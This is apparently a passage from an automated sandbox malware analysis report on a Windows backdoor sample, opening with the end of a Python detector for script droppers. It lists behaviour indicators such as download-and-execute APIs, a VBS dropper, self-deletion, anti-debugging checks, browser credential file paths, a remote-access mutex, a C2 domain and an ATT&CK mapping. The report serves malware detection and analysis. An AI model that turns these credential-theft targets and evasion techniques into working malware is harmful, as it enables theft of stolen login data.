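    if PureWindowsPath(event["Image"]).name.lower() not in SCRIPT_HOSTS:
        return None
    args = split_cmdline(event["CommandLine"])[1:]          # drop argv[0]
    scripts = [a for a in args if PureWindowsPath(a).suffix.lower() in SCRIPT_EXTS]
    if not scripts:
        return None
    reasons = []
    for script in scripts:
        if any(folder in script.lower() for folder in USER_WRITABLE):
            reasons.append(f"script in user-writable folder: {script}")
    if not event["ParentImage"].lower().startswith(SYSTEM_PARENTS):
        reasons.append(f"script host spawned by non-system parent: {event['ParentImage']}")
    return reasons or None


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["Image"], "->", detect_script_dropper(ev))
```

The report's launch produces two reasons (script in Temp, parent in the user's Desktop); the Program Files script started by Explorer and the notepad launch produce none. In a real pipeline the "File deleted" row further down, where wscript.exe removes the dropper, is the natural second event to correlate with this hit.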
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: policymanager.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: xi0TpAxHGMsm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: xi0TpAxHGMsm.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: xi0TpAxHGMsm.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: xi0TpAxHGMsm.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: xi0TpAxHGMsm.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: xi0TpAxHGMsm.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, | 0_2_0041CB50
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00457106 push ecx; ret | 0_2_00457119
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00457A28 push eax; ret | 0_2_00457A46
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00434E56 push ecx; ret | 0_2_00434E69
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW, | 0_2_00406EB0
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 0_2_0041AA4A

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\wscript.exe | File deleted: c:\users\user\desktop\xi0tpaxhgmsm.exe
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, | 0_2_0041CB50
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040F7A7 Sleep,ExitProcess, | 0_2_0040F7A7
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, | 0_2_0041A748
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, | 0_2_00409253
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, | 0_2_0041C291
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, | 0_2_0040C34D
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, | 0_2_00409665
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0044E879 FindFirstFileExA, | 0_2_0044E879
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, | 0_2_0040880C
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040783C FindFirstFileW,FindNextFileW, | 0_2_0040783C
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, | 0_2_00419AF5
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, | 0_2_0040BB30
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, | 0_2_0040BD37
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, | 0_2_00407C97
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309919172.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310125685.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1301052479.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.0000000000718000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309919172.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310125685.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1301052479.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.0000000000718000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW?
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | API call chain: ExitProcess graph end node | graph_0-49203
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_004349F9
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, | 0_2_0041CB50
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h] | 0_2_004432B5
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00412077 GetProcessHeap,HeapFree, | 0_2_00412077
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_004349F9
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00434B47 SetUnhandledExceptionFilter, | 0_2_00434B47
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0043BB22
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_00434FDC
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 0_2_004120F7
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00419627 mouse_event, | 0_2_00419627
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dProgram Manager
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.000000000070F000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000710000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.0000000000702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managertdeskl
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `Program Managerisk.datseJ(f
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.0000000000702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerRA\
Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager=
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1310125685.0000000000711000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309919172.0000000000710000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.0000000000702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager{
Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.000000000070F000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000710000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.0000000000702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerY
Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Disk.dat.0.dr | Binary or memory string: [Program Manager]
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00434C52 cpuid | 0_2_00434C52
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetLocaleInfoA, | 0_2_0040F8D1
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: EnumSystemLocalesW, | 0_2_00452036
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 0_2_004520C3
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetLocaleInfoW, | 0_2_00452313
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: EnumSystemLocalesW, | 0_2_00448404
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 0_2_0045243C
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetLocaleInfoW, | 0_2_00452543
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 0_2_00452610
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: GetLocaleInfoW, | 0_2_004488ED
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, | 0_2_00451CD8
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: EnumSystemLocalesW, | 0_2_00451F50
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: EnumSystemLocalesW, | 0_2_00451F9B
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041B7FF GetSystemTimes,Sleep,GetSystemTimes,__aulldiv, | 0_2_0041B7FF
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_0041B60D GetComputerNameExW,GetUserNameW, | 0_2_0041B60D
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, | 0_2_00449190
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match | File source: xi0TpAxHGMsm.exe, type: SAMPLE
Source: Yara match | File source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Disk\Disk.dat, type: DROPPED
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 0_2_0040BA12
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 0_2_0040BB30
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: \key3.db | 0_2_0040BB30

                    Remote Access Functionality

Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-4QQORA
Source: Yara match | File source: xi0TpAxHGMsm.exe, type: SAMPLE
Source: Yara match | File source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Disk\Disk.dat, type: DROPPED
Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exe | Code function: cmd.exe | 0_2_0040569A
MITRE ATT&CK Matrix (one line per tactic, techniques in the matrix's row order; a technique prefixed with a number was matched by that many signatures, unnumbered techniques had no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Native API; 12 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 11 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 22 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 File Deletion; 1 Masquerading; 1 Access Token Manipulation; 22 Process Injection
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 23 System Information Discovery; 21 Security Software Discovery; 2 Process Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 22 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
xi0TpAxHGMsm.exe | 100% | Avira | BDS/Backdoor.Gen
xi0TpAxHGMsm.exe | 100% | Joe Sandbox ML |
No Antivirus matches

Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
sendfiletiahforem.duckdns.org | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpT | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpSystem32 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpI | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp7 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp- | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpN | 0% | Avira URL Cloud | safe
Domains

